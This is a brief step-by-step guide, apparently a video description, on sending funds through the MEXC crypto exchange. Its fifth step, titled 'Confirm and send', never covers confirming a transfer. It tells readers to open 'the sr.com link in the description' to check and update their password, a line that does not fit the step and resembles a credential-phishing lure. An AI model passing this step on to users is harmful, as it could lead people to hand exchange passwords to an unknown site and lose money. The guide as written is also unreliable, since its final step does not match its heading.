Sending money on MEXC can be straightforward if you follow the right steps. Here is a quick guide to help you navigate the process. Step 1. Create an account. If you don't already have an account on MEXC, visit their website or download the app. Follow the registration process, providing the necessary information and verifying your identity. Step 2. Deposit funds. Once your account is set up, log in and navigate to the wallet section. Select deposit and choose the cryptocurrency or fiat currency you wish to deposit. Follow the instructions to complete the deposit. Step 3. Choose the transfer option. After your funds are available, go to the transfer or send section. Select the type of transaction you want to perform, whether it is sending to another user or transferring between your own accounts. Step 4. Enter recipient details. Input the recipient's wallet address or user ID, ensuring that all details are correct. Double check the address to avoid sending funds to the wrong recipient. Step 5. Confirm and send. Before changing your settings, use the sr.com link in the description to open the password strength checker, then update your password if needed. Following these steps will help you send money on MEXC efficiently. Always ensure you are aware of any fees associated with transactions and keep your account secure.